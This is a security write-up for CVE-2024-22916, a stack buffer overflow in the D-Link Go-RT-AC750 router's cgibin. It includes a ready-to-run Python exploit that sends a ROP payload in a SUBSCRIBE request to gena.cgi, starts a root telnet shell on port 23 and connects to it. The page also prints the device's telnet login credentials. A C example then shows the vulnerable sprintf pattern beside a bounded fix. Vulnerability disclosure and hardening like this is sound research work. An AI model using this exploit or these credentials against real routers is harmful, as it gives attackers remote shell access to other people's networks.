CVE-2024-22916

Product:

D-LINK Go-RT-AC750

Version:

v101b03

Firmware download address:

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-router

Vulnerability Description:

In the cgibin binary, the function sub_40E700 uses sprintf to concatenate attacker-controlled request data into a fixed-size stack buffer without checking the input length. An over-long value overflows the stack, and the overwritten return address can be used to execute arbitrary commands on the router.

PoC

The script below triggers the overflow and runs the command telnetd -l /bin/sh on the router, which starts a shell listener on TCP port 23.

from pwn import context, p32
import os
import socket
import time

# The router is big-endian MIPS; p32() must pack addresses accordingly.
context(os='linux', arch='mips', log_level='debug', endian='big')

TARGET = "192.168.0.1"      # router LAN address
PORT = 49152                # port on which cgibin serves gena.cgi

# Addresses taken from the original PoC for firmware v101b03; libc is
# assumed to be mapped at this fixed base on the device.
libc_base = 0x77f6c000
system_addr = 0x52510       # offset of system() inside libc

cmd = b'telnetd -l /bin/sh;'   # command handed to system(): shell on tcp/23

payload = 449 * b'a'           # fill the stack buffer up to the saved registers
payload += b'b' * 4            # saved registers: contents do not matter
payload += b'b' * 4
payload += b'b' * 4
payload += b'b' * 4
payload += p32(0x0001A6DC + libc_base)   # overwritten return address: libc gadget
payload += p32(system_addr + libc_base)  # system() in libc
payload += b'b' * 4
payload += b'b' * 4
payload += p32(0x0002468C + libc_base)   # second libc gadget
payload += b'c' * 88                     # padding up to the command string
payload += cmd

# The over-long "service" query value reaches the unbounded sprintf.
msg = b"SUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n"
msg += b"Timeout: Second-2333\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.sendall(msg)
s.close()

time.sleep(1)                  # give telnetd a moment to start
os.system(f"telnet {TARGET} 23")

Effect

After the PoC runs, the router's telnet service answers on port 23. User and password:

Alphanetworks
wrgac18_dlob.hans_ac750

Analysis

In genacgi_main, the code path that handles SUBSCRIBE requests calls a function that concatenates the request's service parameter into a fixed-size stack buffer with sprintf. Because the length of the parameter is never checked, an over-long value overflows the stack.
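The following C program is an added example, not code from the router firmware or from the original page. It reproduces the pattern described above (an unbounded sprintf of the service query parameter into a fixed stack buffer) beside a bounded replacement, and uses a request line like the PoC's to show where the length check has to happen. The buffer size SERVICE_BUF, the format string SERVICE_FMT and the small request parser are assumptions for illustration; the page only states that sub_40E700 concatenates with sprintf.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed stack buffer; the real cgibin value is not on the page. */
#define SERVICE_BUF 64
/* Assumed format string; the page only says the function concatenates with sprintf. */
#define SERVICE_FMT "/var/run/gena_%s.sid"

/* Pull the "service" value out of a request line such as
 * "SUBSCRIBE /gena.cgi?service=XYZ HTTP/1.1".  Returns a malloc'd copy
 * (caller frees) or NULL.  No length limit here on purpose: it mirrors a
 * CGI that hands the raw value straight to the formatter below. */
char *gena_service_param(const char *request_line)
{
    const char *p = strstr(request_line, "?service=");
    if (!p) return NULL;
    p += strlen("?service=");
    const char *end = strchr(p, ' ');           /* value ends before " HTTP/1.1" */
    size_t n = end ? (size_t)(end - p) : strlen(p);
    char *out = malloc(n + 1);
    if (!out) return NULL;
    memcpy(out, p, n);
    out[n] = '\0';
    return out;
}

/* Bytes (including the NUL) the unbounded sprintf would write: the number
 * a bounds check has to compare against sizeof(buf). */
size_t bytes_sprintf_would_write(const char *service)
{
    return (size_t)snprintf(NULL, 0, SERVICE_FMT, service) + 1;
}

/* Vulnerable pattern: sprintf into a fixed stack buffer with no bound.
 * Any service value longer than SERVICE_BUF - 19 bytes writes past buf
 * (saved registers, return address).  Only ever call this with short input. */
size_t format_service_vulnerable(const char *service)
{
    char buf[SERVICE_BUF];
    sprintf(buf, SERVICE_FMT, service);         /* the bug: no bound */
    return strlen(buf);
}

/* Hardened replacement: bounded write plus an explicit truncation check,
 * so an over-long value is refused instead of silently corrupting the stack.
 * Returns 0 on success, -1 if the value does not fit. */
int format_service_safe(const char *service, char *out, size_t out_len)
{
    char buf[SERVICE_BUF];
    int n = snprintf(buf, sizeof buf, SERVICE_FMT, service);
    if (n < 0 || (size_t)n >= sizeof buf)
        return -1;                              /* would have overflowed */
    snprintf(out, out_len, "%s", buf);
    return 0;
}

/* Run a whole request line through the hardened path.
 * 1 = rejected as over-long, 0 = accepted, -1 = no service parameter. */
int gena_subscribe_rejected(const char *request_line)
{
    char *svc = gena_service_param(request_line);
    if (!svc) return -1;
    char path[256];
    int rc = format_service_safe(svc, path, sizeof path);
    free(svc);
    return rc == -1;
}

/* Build a request line whose service value is n bytes of 'a' (the PoC uses
 * 449) and report whether the hardened path rejects it; optionally returns
 * how many bytes the unbounded sprintf would have written. */
int probe_service_length(size_t n, size_t *would_write)
{
    char *line = calloc(n + 64, 1);
    if (!line) return -1;
    strcpy(line, "SUBSCRIBE /gena.cgi?service=");
    memset(line + strlen(line), 'a', n);        /* rest of line is still zeroed */
    strcat(line, " HTTP/1.1");
    if (would_write) {
        char *svc = gena_service_param(line);
        *would_write = svc ? bytes_sprintf_would_write(svc) : 0;
        free(svc);
    }
    int rejected = gena_subscribe_rejected(line);
    free(line);
    return rejected;
}

int main(void)
{
    size_t w = 0;
    int r = probe_service_length(449, &w);
    printf("449-byte service: sprintf would write %zu bytes into a %d-byte buffer; "
           "hardened path rejected=%d\n", w, SERVICE_BUF, r);
    return 0;
}
```

The threshold in the comment follows from the format string: the fixed text is 18 bytes plus the NUL, so with a 64-byte buffer a service value of 45 bytes still fits and 46 bytes does not. The point of the hardened version is not snprintf alone but the check of its return value; truncating silently would avoid the crash but still let the request through.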

Source: https://kee02p.github.io/2024/01/13/CVE-2024-22916/
Author: Kee02p
Published: January 13, 2024